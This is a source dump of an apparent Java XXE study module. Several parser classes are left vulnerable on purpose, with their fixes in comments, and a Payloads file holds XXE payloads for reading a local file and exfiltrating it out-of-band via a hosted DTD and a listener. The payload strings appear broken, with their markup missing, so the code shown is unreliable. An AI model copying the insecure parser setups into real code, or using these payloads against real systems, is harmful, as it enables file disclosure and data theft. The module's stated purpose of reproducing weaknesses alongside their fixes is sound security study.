/xxe/src/main/java/com/threedr3am/bug/xxe/Features.java: -------------------------------------------------------------------------------- 1 | package com.threedr3am.bug.xxe; 2 | 3 | /** 4 | * 各种feature 5 | * 6 | * @author xuanyh 7 | */ 8 | public interface Features { 9 | 10 | String FEATURE = "http://apache.org/xml/features/disallow-doctype-decl"; 11 | 12 | /** 13 | * 是否允许使用通用实体 14 | */ 15 | String FEATURE2 = "http://xml.org/sax/features/external-general-entities"; 16 | 17 | /** 18 | * 是否允许使用参数实体 19 | */ 20 | String FEATURE3 = "http://xml.org/sax/features/external-parameter-entities"; 21 | 22 | /** 23 | * 是否允许加载外部DTD实体 24 | */ 25 | String FEATURE4 = "http://apache.org/xml/features/nonvalidating/load-external-dtd"; 26 | 27 | /** 28 | * 是否启用安全性处理 29 | */ 30 | String FEATURE_SECURE_PROCESSING = "http://javax.xml.XMLConstants/feature/secure-processing"; 31 | 32 | /** 33 | * 是否允许使用外部DTD实体 34 | */ 35 | String ACCESS_EXTERNAL_DTD = "http://javax.xml.XMLConstants/property/accessExternalDTD"; 36 | 37 | String ACCESS_EXTERNAL_SCHEMA = "http://javax.xml.XMLConstants/property/accessExternalSchema"; 38 | 39 | String ACCESS_EXTERNAL_STYLESHEET = "http://javax.xml.XMLConstants/property/accessExternalStylesheet"; 40 | } 41 | -------------------------------------------------------------------------------- /xxe/src/main/java/com/threedr3am/bug/xxe/Payloads.java: -------------------------------------------------------------------------------- 1 | package com.threedr3am.bug.xxe; 2 | 3 | /** 4 | * 各种xml xxe payload 5 | * 6 | * @author xuanyh 7 | */ 8 | public interface Payloads { 9 | 10 | /** 11 | * 有回显的payload xml 12 | * 13 | * 读取/tmp/aaa文件内容 14 | */ 15 | String FEEDBACK = 16 | "" 17 | + "" 19 | + " ]>" 20 | + "&xxe;"; 21 | 22 | /** 23 | * 没有回显,只能带出去的payload xml,读取文件单行 24 | * 25 | * 读取/tmp/aaa文件内容 26 | * 127.0.0.1:80的http web服务器存放xxe.dtd文件: 27 | * "> 28 | * 监听23232端口 29 | */ 30 | String NO_FEEDBACK_SINGLE_LINE = 31 | "" 32 | + "" 34 | + " " 35 | + " %remote;%all;" 36 | + "]>" 37 | + 
"&send;"; 38 | 39 | /** 40 | * 没有回显,只能带出去的payload xml,读取文件多行 41 | * 42 | * 读取/tmp/aaa文件内容 43 | * 127.0.0.1:80的http web服务器存放xxe.dtd文件: 44 | * "> 45 | * 监听23232端口 46 | */ 47 | String NO_FEEDBACK_MULT_LINE = 48 | "" 49 | + "" 51 | + " " 52 | + " %remote;%all;" 53 | + "]>" 54 | + "&send;"; 55 | } 56 | -------------------------------------------------------------------------------- /xxe/src/main/java/com/threedr3am/bug/xxe/SAXBuilder_JDOMTest.java: -------------------------------------------------------------------------------- 1 | package com.threedr3am.bug.xxe; 2 | 3 | import java.io.ByteArrayInputStream; 4 | import java.io.IOException; 5 | import java.util.List; 6 | import org.jdom.Content; 7 | import org.jdom.Document; 8 | import org.jdom.Element; 9 | import org.jdom.JDOMException; 10 | import org.jdom.input.SAXBuilder; 11 | 12 | /** 13 | * JDOM方式 - SAXBuilder 14 | * 15 | * @author xuanyh 16 | */ 17 | public class SAXBuilder_JDOMTest { 18 | 19 | public static void main(String[] args) throws JDOMException, IOException { 20 | //todo 存在xxe漏洞 21 | SAXBuilder saxBuilder = new SAXBuilder(); 22 | 23 | //todo 修复方式1 24 | // SAXBuilder saxBuilder = new SAXBuilder(true); 25 | 26 | //todo 修复方式2 27 | // SAXBuilder saxBuilder = new SAXBuilder(); 28 | // saxBuilder.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true); 29 | // saxBuilder.setFeature("http://xml.org/sax/features/external-general-entities", false); 30 | // saxBuilder.setFeature("http://xml.org/sax/features/external-parameter-entities", false); 31 | // saxBuilder.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", false); 32 | 33 | ByteArrayInputStream byteArrayInputStream = new ByteArrayInputStream(Payloads.FEEDBACK.getBytes()); 34 | Document document = saxBuilder.build(byteArrayInputStream); 35 | Element element = document.getRootElement(); 36 | List contents = element.getContent(); 37 | for (Content content : contents) { 38 | System.out.println(content.getValue()); 39 | } 
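40 | } 41 | } 42 | --------------------------------------------------------------------------------
/xxe/src/main/java/com/threedr3am/bug/xxe/SAXReader_DOM4JTest.java:
--------------------------------------------------------------------------------
package com.threedr3am.bug.xxe;

import java.io.ByteArrayInputStream;
import java.nio.charset.StandardCharsets;
import org.dom4j.Document;
import org.dom4j.DocumentException;
import org.dom4j.Element;
import org.dom4j.io.SAXReader;
import org.xml.sax.SAXException;

/**
 * DOM4J variant - SAXReader.
 * <p>
 * The reader is created with its default features, so the DOCTYPE in
 * {@link Payloads#FEEDBACK} is honoured and the resolved entity is echoed to stdout.
 * The commented block is the hardening: reject DOCTYPE declarations and switch off
 * external general/parameter entities and external-DTD loading ({@link Features}
 * holds the same URIs as named constants).
 *
 * @author xuanyh
 */
public class SAXReader_DOM4JTest {

    public static void main(String[] args) throws DocumentException, SAXException {
        SAXReader saxReader = new SAXReader();

        //todo fix
        // saxReader.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
        // saxReader.setFeature("http://xml.org/sax/features/external-general-entities", false);
        // saxReader.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
        // saxReader.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", false);

        // explicit charset: getBytes() without one depends on the platform default
        ByteArrayInputStream byteArrayInputStream = new ByteArrayInputStream(
            Payloads.FEEDBACK.getBytes(StandardCharsets.UTF_8));
        Document document = saxReader.read(byteArrayInputStream);
        Element element = document.getRootElement();
        System.out.println(element.getText());
    }
}
--------------------------------------------------------------------------------
/xxe/src/main/java/com/threedr3am/bug/xxe/SAXTransformerFactoryTest.java:
--------------------------------------------------------------------------------
package com.threedr3am.bug.xxe;

import java.io.ByteArrayInputStream;
import java.nio.charset.StandardCharsets;
import javax.xml.transform.TransformerConfigurationException;
import javax.xml.transform.sax.SAXTransformerFactory;
import javax.xml.transform.stream.StreamSource;

/**
 * SAXTransformerFactory variant.
 * <p>
 * This path throws instead of echoing anything, so the only observable effect is the
 * request the parser makes while resolving the DTD; that is why the no-echo payload
 * ({@link Payloads#NO_FEEDBACK_SINGLE_LINE}) is used here. The commented block is the
 * hardening: blanking {@code ACCESS_EXTERNAL_DTD} and {@code ACCESS_EXTERNAL_STYLESHEET}
 * denies every protocol for external DTDs and stylesheets.
 *
 * @author xuanyh
 */
public class SAXTransformerFactoryTest {

    public static void main(String[] args) throws TransformerConfigurationException {
        SAXTransformerFactory sf = (SAXTransformerFactory) SAXTransformerFactory.newInstance();

        //todo fix
        // sf.setAttribute(XMLConstants.ACCESS_EXTERNAL_DTD, "");
        // sf.setAttribute(XMLConstants.ACCESS_EXTERNAL_STYLESHEET, "");

        // explicit charset: getBytes() without one depends on the platform default
        ByteArrayInputStream byteArrayInputStream = new ByteArrayInputStream(
            Payloads.NO_FEEDBACK_SINGLE_LINE.getBytes(StandardCharsets.UTF_8));
        StreamSource source = new StreamSource(byteArrayInputStream);
        sf.newTransformerHandler(source);
    }

}
--------------------------------------------------------------------------------
/xxe/src/main/java/com/threedr3am/bug/xxe/SchemaFactoryTest.java:
--------------------------------------------------------------------------------
package com.threedr3am.bug.xxe;

import java.io.ByteArrayInputStream;
import java.nio.charset.StandardCharsets;
import javax.xml.transform.stream.StreamSource;
import javax.xml.validation.Schema;
import javax.xml.validation.SchemaFactory;
import org.xml.sax.SAXException;

/**
 * SchemaFactory variant.
 * <p>
 * The factory is created with defaults, so compiling the payload as a schema parses
 * its DOCTYPE. The commented block is the hardening: {@code ACCESS_EXTERNAL_DTD} and
 * {@code ACCESS_EXTERNAL_SCHEMA} set to the empty string, which denies every protocol.
 *
 * @author xuanyh
 */
public class SchemaFactoryTest {

    public static void main(String[] args)
        throws SAXException {
        SchemaFactory factory = SchemaFactory.newInstance("http://www.w3.org/2001/XMLSchema");

        //todo fix
        // factory.setProperty(XMLConstants.ACCESS_EXTERNAL_DTD, "");
        // factory.setProperty(XMLConstants.ACCESS_EXTERNAL_SCHEMA, "");

        // explicit charset: getBytes() without one depends on the platform default
        ByteArrayInputStream byteArrayInputStream = new ByteArrayInputStream(
            Payloads.NO_FEEDBACK_SINGLE_LINE.getBytes(StandardCharsets.UTF_8));
        StreamSource source = new StreamSource(byteArrayInputStream);
        // result intentionally unused: compiling the schema is what triggers the parse
        Schema schema = factory.newSchema(source);
    }
}
--------------------------------------------------------------------------------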
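/xxe/src/main/java/com/threedr3am/bug/xxe/TransformerFactoryTest.java:
--------------------------------------------------------------------------------
package com.threedr3am.bug.xxe;

import java.io.ByteArrayInputStream;
import java.nio.charset.StandardCharsets;
import javax.xml.XMLConstants;
import javax.xml.transform.TransformerException;
import javax.xml.transform.TransformerFactory;
import javax.xml.transform.dom.DOMResult;
import javax.xml.transform.stream.StreamSource;

/**
 * TransformerFactory variant, shown in its hardened form: both JAXP 1.5 access
 * properties are blanked before any source is parsed, so the DOCTYPE in
 * {@link Payloads#NO_FEEDBACK_SINGLE_LINE} cannot pull in an external DTD or
 * stylesheet. The other variants in this package keep the equivalent calls commented
 * out.
 *
 * @author xuanyh
 */
public class TransformerFactoryTest {

    public static void main(String[] args) throws TransformerException {
        TransformerFactory tf = TransformerFactory.newInstance();

        // fix: "" denies every protocol for external DTDs and for xsl:import/xsl:include
        tf.setAttribute(XMLConstants.ACCESS_EXTERNAL_DTD, "");
        tf.setAttribute(XMLConstants.ACCESS_EXTERNAL_STYLESHEET, "");

        // explicit charset: getBytes() without one depends on the platform default
        ByteArrayInputStream byteArrayInputStream = new ByteArrayInputStream(
            Payloads.NO_FEEDBACK_SINGLE_LINE.getBytes(StandardCharsets.UTF_8));
        StreamSource source = new StreamSource(byteArrayInputStream);
        DOMResult domResult = new DOMResult();
        tf.newTransformer().transform(source, domResult);
    }

}
--------------------------------------------------------------------------------
/xxe/src/main/java/com/threedr3am/bug/xxe/UnmarshallerTest.java:
--------------------------------------------------------------------------------
package com.threedr3am.bug.xxe;

import java.io.ByteArrayInputStream;
import java.nio.charset.StandardCharsets;
import javax.xml.bind.JAXBContext;
import javax.xml.bind.JAXBException;
import javax.xml.bind.Unmarshaller;

/**
 * JAXB Unmarshaller variant.
 * <p>
 * {@code Unmarshaller.unmarshal(InputStream)} lets JAXB create the underlying parser
 * with its defaults, so the DOCTYPE in the payload is processed. The standard JAXB API
 * exposes no parser feature switch of its own; the hardening is to parse with a reader
 * you configured yourself and hand JAXB a {@code javax.xml.transform.Source} - for
 * example a {@code StAXSource} over an {@code XMLInputFactory} with
 * {@code XMLInputFactory.SUPPORT_DTD} set to {@code false} (sketched in the commented
 * block below).
 *
 * @author xuanyh
 */
public class UnmarshallerTest {

    public static void main(String[] args) throws JAXBException {
        Class<A> tClass = A.class;
        JAXBContext context = JAXBContext.newInstance(tClass);
        Unmarshaller um = context.createUnmarshaller();
        // explicit charset: getBytes() without one depends on the platform default
        ByteArrayInputStream byteArrayInputStream = new ByteArrayInputStream(
            Payloads.NO_FEEDBACK_SINGLE_LINE.getBytes(StandardCharsets.UTF_8));

        //todo fix (not applied; createXMLStreamReader adds a checked XMLStreamException)
        // XMLInputFactory xif = XMLInputFactory.newFactory();
        // xif.setProperty(XMLInputFactory.SUPPORT_DTD, false);
        // xif.setProperty(XMLInputFactory.IS_SUPPORTING_EXTERNAL_ENTITIES, false);
        // Object o = um.unmarshal(new StAXSource(xif.createXMLStreamReader(byteArrayInputStream)));

        Object o = um.unmarshal(byteArrayInputStream);
        // result unused: the cast only asserts that JAXB produced an A
        tClass.cast(o);
    }

    // bean bound by JAXB; "root" is the element name the payload's root maps onto
    static class A {
        public String root;

        public String getRoot() {
            return root;
        }

        public void setRoot(String root) {
            this.root = root;
        }
    }
}
--------------------------------------------------------------------------------
/xxe/src/main/java/com/threedr3am/bug/xxe/ValidatorSampleTest.java:
--------------------------------------------------------------------------------
package com.threedr3am.bug.xxe;

import java.io.ByteArrayInputStream;
import java.io.IOException;
import java.nio.charset.StandardCharsets;
import javax.xml.XMLConstants;
import javax.xml.transform.stream.StreamSource;
import javax.xml.validation.Schema;
import javax.xml.validation.SchemaFactory;
import javax.xml.validation.Validator;
import org.xml.sax.SAXException;

/**
 * Schema Validator variant.
 * <p>
 * {@code factory.newSchema()} with no arguments yields a schema that validates against
 * whatever the instance document itself references; the {@link Validator} then parses
 * the payload with default settings. The commented block is the hardening:
 * {@code ACCESS_EXTERNAL_DTD} and {@code ACCESS_EXTERNAL_SCHEMA} blanked on the
 * validator before {@code validate} runs.
 *
 * @author xuanyh
 */
public class ValidatorSampleTest {

    public static void main(String[] args)
        throws SAXException, IOException {
        SchemaFactory factory = SchemaFactory.newInstance("http://www.w3.org/2001/XMLSchema");
        Schema schema = factory.newSchema();
        Validator validator = schema.newValidator();
        // explicit charset: getBytes() without one depends on the platform default
        ByteArrayInputStream byteArrayInputStream = new ByteArrayInputStream(
            Payloads.NO_FEEDBACK_SINGLE_LINE.getBytes(StandardCharsets.UTF_8));

        //todo fix
        // validator.setProperty(XMLConstants.ACCESS_EXTERNAL_DTD, "");
        // validator.setProperty(XMLConstants.ACCESS_EXTERNAL_SCHEMA, "");

        StreamSource source = new StreamSource(byteArrayInputStream);
        validator.validate(source);

    }
}
--------------------------------------------------------------------------------
/xxe/src/main/java/com/threedr3am/bug/xxe/XMLReaderTest.java:
--------------------------------------------------------------------------------
package com.threedr3am.bug.xxe;

import java.io.ByteArrayInputStream;
import java.io.IOException;
import java.nio.charset.StandardCharsets;
import org.xml.sax.InputSource;
import org.xml.sax.SAXException;
import org.xml.sax.XMLReader;
import org.xml.sax.helpers.XMLReaderFactory;

/**
 * Raw SAX XMLReader variant, shown in its hardened form: DOCTYPE declarations are
 * rejected and external entities / external-DTD loading are disabled before
 * {@code parse} is called. {@link Features} holds the same feature URIs as named
 * constants.
 *
 * @author xuanyh
 */
public class XMLReaderTest {

    public static void main(String[] args) throws SAXException, IOException {
        // XMLReaderFactory is deprecated since Java 9; SAXParserFactory.newInstance()
        // .newSAXParser().getXMLReader() is the replacement and accepts the same features
        XMLReader reader = XMLReaderFactory.createXMLReader();
        // explicit charset: getBytes() without one depends on the platform default
        ByteArrayInputStream byteArrayInputStream = new ByteArrayInputStream(
            Payloads.NO_FEEDBACK_SINGLE_LINE.getBytes(StandardCharsets.UTF_8));

        // fix: disallow-doctype-decl alone turns the payload's DOCTYPE into a fatal error;
        // the other three close the entity/DTD paths on parsers that lack that feature
        reader.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
        reader.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", false);
        reader.setFeature("http://xml.org/sax/features/external-general-entities", false);
        reader.setFeature("http://xml.org/sax/features/external-parameter-entities", false);

        reader.parse(new InputSource(byteArrayInputStream));
    }
}
--------------------------------------------------------------------------------
/xxe/src/main/java/com/threedr3am/bug/xxe/package-info.java:
--------------------------------------------------------------------------------
/**
 * 1. Reproduces the XXE weakness in each XML parsing API, together with its fix
 * 2. Collects the relevant parser features and studies what each one does
 * 3. Studies echoed and non-echoed (out-of-band) cases, for single-line and multi-line data
 * 4. Studies behaviour across JVM versions
 *
 * @author xuanyh
 */
package com.threedr3am.bug.xxe; --------------------------------------------------------------------------------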